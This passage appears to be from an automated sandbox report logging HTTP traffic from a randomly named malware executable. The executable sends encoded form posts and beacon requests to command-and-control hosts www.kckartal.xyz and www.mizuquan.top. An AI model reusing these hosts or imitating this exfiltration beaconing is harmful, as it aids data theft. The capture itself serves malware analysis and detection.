                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 65 5a 65 68 70 55 53 32 50 72 75 39 32 37 71 71 62 66 55 46 4e 69 6e 32 50 4e 4e 6d 71 39 54 31 4c 49 71 49 61 78 77 70 6f 4b 53 63 56 66 77 41 4f 75 69 4e 63 30 53 45 61 64 72 38 46 4e 6c 32 6e 4a 52 63 63 32 30 6f 4a 41 33 35 72 71 67 52 36 69 4c 67 7a 37 58 62 39 79 72 66 34 49 2b 49 53 78 33 42 2b 43 4b 69 6a 31 6c 58 61 79 6f 4d 63 6c 73 6e 34 41 36 4f 51 73 74 53 35 70 4d 65 77 77 56 47 59 70 46 4c 4d 66 2b 47 4a 72 49 43 43 66 30 74 35 48 6e 68 63 79 4c 41 5a 74 50 45 75 50 4d 62 59 35 45 42 31 55 64 70 6a 55 6f 6a 6e 39 52 75 65 2b 68 4c 6f 51 3d
                    Data Ascii: nR=yZO9aB74W3A3ueZehpUS2Pru927qqbfUFNin2PNNmq9T1LIqIaxwpoKScVfwAOuiNc0SEadr8FNl2nJRcc20oJA35rqgR6iLgz7Xb9yrf4I+ISx3B+CKij1lXayoMclsn4A6OQstS5pMewwVGYpFLMf+GJrICCf0t5HnhcyLAZtPEuPMbY5EB1UdpjUojn9Rue+hLoQ=
                    Sep 12, 2024 13:04:38.374731064 CEST1236INHTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:04:38 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    vary: User-Agent
                    x-turbo-charged-by: LiteSpeed
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cu4AuzxpRL2wTxYxs46mljvEueJbNkia0oL3qB9VHt%2B9jKlnl8dLMzG%2BM9O03TcFosbptdMI946VO21SgBfzzN%2BiwuguYKXPamtmNE8yUOrnDlpYVsjbJzNCwqnab%2Fk9qhE4"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c1f6af69f017c88-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                    Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
                    Sep 12, 2024 13:04:38.374779940 CEST238INData Raw: a9 14 d9 4d 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72
                    Data Ascii: M[!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?be0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    30192.168.2.549743104.21.20.125804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:40.330420017 CEST744OUTPOST /h5qr/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.kckartal.xyz
                    Origin: http://www.kckartal.xyz
                    Referer: http://www.kckartal.xyz/h5qr/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 2b 70 65 74 71 73 53 78 76 72 70 68 6d 37 71 34 62 66 51 46 4e 2b 6e 32 4b 31 64 6d 59 70 54 79 76 45 71 4a 65 6c 77 75 6f 4b 53 55 31 66 78 45 4f 75 70 4e 63 34 67 45 59 35 72 38 46 5a 6c 32 6e 5a 52 64 72 69 33 71 5a 41 69 30 4c 71 69 50 4b 69 4c 67 7a 37 58 62 39 4f 42 66 34 77 2b 49 43 42 33 44 63 6e 63 38 54 31 6d 57 61 79 6f 65 73 6c 6f 6e 34 42 5a 4f 56 31 4b 53 37 68 4d 65 79 34 56 46 4d 39 61 42 4d 66 34 43 4a 71 67 44 32 47 47 6b 2f 62 30 6e 64 48 6b 54 71 35 41 46 59 69 6d 42 36 78 73 53 56 34 6c 35 77 63 66 79 58 63 34 30 39 75 52 56 2f 47 79 57 46 4b 38 4f 77 4d 30 79 71 67 72 49 4f 68 31 70 76 50 48
                    Data Ascii: nR=yZO9aB74W3A3u+petqsSxvrphm7q4bfQFN+n2K1dmYpTyvEqJelwuoKSU1fxEOupNc4gEY5r8FZl2nZRdri3qZAi0LqiPKiLgz7Xb9OBf4w+ICB3Dcnc8T1mWayoeslon4BZOV1KS7hMey4VFM9aBMf4CJqgD2GGk/b0ndHkTq5AFYimB6xsSV4l5wcfyXc409uRV/GyWFK8OwM0yqgrIOh1pvPH
                    Sep 12, 2024 13:04:40.895057917 CEST743INHTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:04:40 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    vary: User-Agent
                    x-turbo-charged-by: LiteSpeed
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fR0eDN0ahzolpeqCaEkjqCwzapq2rxqopn63SOWpsz5sKwF8MB81mDO0fgkR2G7x9UqFiBO6b7PUH2DMZ9BPGjSVS9jCoo9QFsq7x7VedTJgeZAm8Sz%2BTzgiRnvUv4PNDWDe"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c1f6b068c504397-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                    Data Ascii: f
                    Sep 12, 2024 13:04:40.896543026 CEST735INData Raw: 32 63 33 0d 0a 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07
                    Data Ascii: 2c3dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhy


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    31192.168.2.549744104.21.20.125804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:42.874250889 CEST1761OUTPOST /h5qr/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.kckartal.xyz
                    Origin: http://www.kckartal.xyz
                    Referer: http://www.kckartal.xyz/h5qr/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 79 5a 4f 39 61 42 37 34 57 33 41 33 75 2b 70 65 74 71 73 53 78 76 72 70 68 6d 37 71 34 62 66 51 46 4e 2b 6e 32 4b 31 64 6d 59 78 54 31 63 4d 71 49 38 4e 77 76 6f 4b 53 61 56 66 30 45 4f 75 4f 4e 64 52 70 45 59 30 55 38 47 68 6c 77 45 68 52 55 36 69 33 77 4a 41 69 39 72 71 6a 52 36 6a 44 67 79 4c 54 62 35 75 42 66 34 77 2b 49 42 4a 33 45 4f 44 63 2b 54 31 6c 58 61 7a 70 4d 63 6c 4d 6e 34 34 69 4f 52 70 77 52 49 35 4d 65 53 49 56 4a 66 46 61 4e 4d 66 36 50 70 71 34 44 7a 65 64 6b 37 37 47 6e 64 44 64 54 71 52 41 48 65 7a 69 46 35 56 6d 4c 45 74 42 78 69 4d 46 31 48 4a 42 33 4c 7a 71 52 4e 6d 58 4c 6d 57 45 4a 48 46 30 2f 71 74 67 52 4b 68 50 70 6f 54 4a 64 6f 6d 42 6d 33 71 50 69 54 4a 56 43 36 4e 70 50 57 44 45 41 79 64 32 59 79 75 5a 74 46 37 51 4f 72 79 4e 67 54 2b 37 52 57 64 7a 50 77 44 46 38 79 4d 51 36 42 42 34 4d 58 69 50 2b 6c 65 46 4e 2f 51 62 36 78 36 41 72 35 79 4e 50 4b 32 49 44 6c 73 52 78 6a 2b 6e 68 41 58 47 74 41 75 44 53 63 56 67 37 58 38 61 32 64 56 6b 67 4e 70 41 7a 63 50 [TRUNCATED]
                    Data Ascii: nR=yZO9aB74W3A3u+petqsSxvrphm7q4bfQFN+n2K1dmYxT1cMqI8NwvoKSaVf0EOuONdRpEY0U8GhlwEhRU6i3wJAi9rqjR6jDgyLTb5uBf4w+IBJ3EODc+T1lXazpMclMn44iORpwRI5MeSIVJfFaNMf6Ppq4Dzedk77GndDdTqRAHeziF5VmLEtBxiMF1HJB3LzqRNmXLmWEJHF0/qtgRKhPpoTJdomBm3qPiTJVC6NpPWDEAyd2YyuZtF7QOryNgT+7RWdzPwDF8yMQ6BB4MXiP+leFN/Qb6x6Ar5yNPK2IDlsRxj+nhAXGtAuDScVg7X8a2dVkgNpAzcPYvuAIxyaTZW5mzBq33cmnwQVkzXnDtdClB9XnmJdFs/8f53CC1NJH60akV1wMq3mQ1PHXpKxg3Yx0ccgxPhcUKBsq1TJSi6ZXuDIKrRDMArrbLam65LPj280h3yU87GSATI0NnueiVBh0MbXLhC6XgczpDrRR31qE3MHF93MloeD2zSaYQXeTRWhaNZRfND+o73SUXiF3zq5nfEgMq3JUsbW0PRlB41zuX53sTEGktKCUJlgeWrI1yvgsopeWKICSXN7RljKecwVAI2XXvQV0XQ0nQ21glMOw6Do+YucRqqj6NVTz+jEsx/0fTlvSGC5UnOcpBzdNNIZ+fy7f+rKdOtxYWvhncn5AsI42tZ2ez0NDzJjHq/2TM6STO/9VkaO5rU7N0R1YkyJ3GjDaLPuS5ruwNUtVp+6pyYYsccAfji05WmNuONQCMatL78GsV9UWSdfJLmj4zWd7Iu54ntw9yhC4SixVfSJmoMucXzUb66zB5/8UMkoRaEwfJ8Wi/BWCeJVeMHe8Q2WQ7JY+Tiyp0Iax4UeYFNwt7UX1CnlnpRqfPd8bMaj6PjRyGa3EPJVnONe1aek7s4oNxajZYSB58G/v+BnfieRIUuVCB6HmgSWIh7ls1ZEewT3jgtZBxzi56r6LuvKVjPQO/Axoop+qfueVeBrkZU913 [TRUNCATED]
                    Sep 12, 2024 13:04:43.482140064 CEST1236INHTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:04:43 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    vary: User-Agent
                    x-turbo-charged-by: LiteSpeed
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ySnAys4vajTxzl7Yg4RQWqJcEYQqkRpB%2FybzzWf2DWT6xymjP20YNYkw1n14Zpk5UzfGS8q76SLQ9PauYnPfkt%2FTaWF8l4MQB89%2BN1xDS1IBLEhe6zjUrzHR1xZFFRyD6HA0"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c1f6b169d296a57-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                    Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
                    Sep 12, 2024 13:04:43.482203007 CEST231INData Raw: d9 4d 11 5b 21 86 09 e7 45 f9 40 b0 47 23 99 46 2c 5b 83 d2 17 8d 63 5d 3e d6 f4 c1 df 94 79 9a 89 6c d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72 b5 9a
                    Data Ascii: M[!E@G#F,[c]>ylo:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?be
                    Sep 12, 2024 13:04:43.482933044 CEST5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    32192.168.2.549745104.21.20.125804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:45.422066927 CEST459OUTGET /h5qr/?nR=/bmdZ0vLXnogocV3t4J0vpXKy2/OoNnhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5ev2o5O2JmBXO2rvj/sbpH3UdghJzgGJYmb4kNKd7aCf9ce4Q==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.kckartal.xyz
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:04:46.012533903 CEST707INHTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:04:45 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    vary: User-Agent
                    x-turbo-charged-by: LiteSpeed
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FhL9y84kDn1sEz%2BD9e2Qg0cQf7%2FoLEPYEVclK4CegNdVAvA6Sa3%2BJUHu398le0%2B1z71EgyBJrXzgHuMnrdNYexclUALeAguc1ca8Kxoi0e6i46CqI5ICAeELkTaY7OfAikbV"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c1f6b26596443ad-EWR
                    alt-svc: h3=":443"; ma=86400
                    Sep 12, 2024 13:04:46.012829065 CEST1236INData Raw: 34 65 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65
                    Data Ascii: 4e2<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000
                    Sep 12, 2024 13:04:46.012864113 CEST32INData Raw: 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: /div></body></html>10


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    33192.168.2.54974643.242.202.169804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:52.008840084 CEST724OUTPOST /ed2j/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.mizuquan.top
                    Origin: http://www.mizuquan.top
                    Referer: http://www.mizuquan.top/ed2j/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 4b 38 5a 50 68 79 6a 4f 59 38 70 66 76 53 79 4c 44 55 44 63 4d 6e 2f 51 5a 64 54 36 5a 74 2f 51 47 52 2b 66 46 43 62 52 41 37 57 75 46 61 4f 77 52 2b 35 62 66 54 4a 72 44 37 50 68 32 54 62 34 6e 43 4d 79 7a 58 7a 59 75 71 4e 6b 37 77 42 30 43 7a 52 75 55 65 38 58 30 4d 59 54 66 67 2f 69 66 6c 4c 6e 64 57 6c 37 42 46 5a 42 32 52 45 53 48 79 2f 63 79 48 7a 57 36 43 62 37 6a 6c 79 53 47 74 65 58 35 4d 75 41 74 54 54 30 78 58 6e 6f 33 44 36 68 69 73 54 39 59 68 45 2f 4e 6a 30 36 76 6c 50 70 37 41 53 75 37 35 62 34 5a 53 71 75 65 61 33 6b 4f 6c 61 34 4b 6b 3d
                    Data Ascii: nR=Klwv1EENmccPyK8ZPhyjOY8pfvSyLDUDcMn/QZdT6Zt/QGR+fFCbRA7WuFaOwR+5bfTJrD7Ph2Tb4nCMyzXzYuqNk7wB0CzRuUe8X0MYTfg/iflLndWl7BFZB2RESHy/cyHzW6Cb7jlySGteX5MuAtTT0xXno3D6hisT9YhE/Nj06vlPp7ASu75b4ZSquea3kOla4Kk=
                    Sep 12, 2024 13:04:52.881658077 CEST691INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:52 GMT
                    Content-Type: text/html
                    Content-Length: 548
                    Connection: close
                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    34192.168.2.54974743.242.202.169804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:54.549732924 CEST744OUTPOST /ed2j/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.mizuquan.top
                    Origin: http://www.mizuquan.top
                    Referer: http://www.mizuquan.top/ed2j/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 71 4d 5a 66 32 4f 6a 4a 34 38 32 42 2f 53 79 42 6a 55 35 63 4d 72 2f 51 62 77 49 35 76 64 2f 54 6e 68 2b 52 6b 43 62 53 41 37 57 68 6c 62 45 74 42 2f 33 62 66 58 33 72 43 48 50 68 32 48 62 34 6c 61 4d 6e 51 76 77 62 65 71 4c 69 37 77 48 70 53 7a 52 75 55 65 38 58 30 59 79 54 62 4d 2f 69 73 74 4c 6d 34 37 7a 6e 78 46 65 4c 57 52 45 59 58 7a 30 63 79 47 6b 57 2f 61 78 37 67 4e 79 53 47 64 65 5a 49 4d 74 4a 74 54 56 77 78 57 76 70 43 6a 30 35 53 30 45 77 37 30 31 67 4f 58 2b 79 35 49 6c 7a 5a 49 36 39 62 56 6a 6f 4b 61 64 2f 75 37 65 2b 74 31 71 6d 64 79 49 30 6a 36 68 6b 2f 62 47 30 36 49 4c 71 35 6d 65 32 31 38 43
                    Data Ascii: nR=Klwv1EENmccPyqMZf2OjJ482B/SyBjU5cMr/QbwI5vd/Tnh+RkCbSA7WhlbEtB/3bfX3rCHPh2Hb4laMnQvwbeqLi7wHpSzRuUe8X0YyTbM/istLm47znxFeLWREYXz0cyGkW/ax7gNySGdeZIMtJtTVwxWvpCj05S0Ew701gOX+y5IlzZI69bVjoKad/u7e+t1qmdyI0j6hk/bG06ILq5me218C
                    Sep 12, 2024 13:04:55.402774096 CEST691INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:55 GMT
                    Content-Type: text/html
                    Content-Length: 548
                    Connection: close
                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
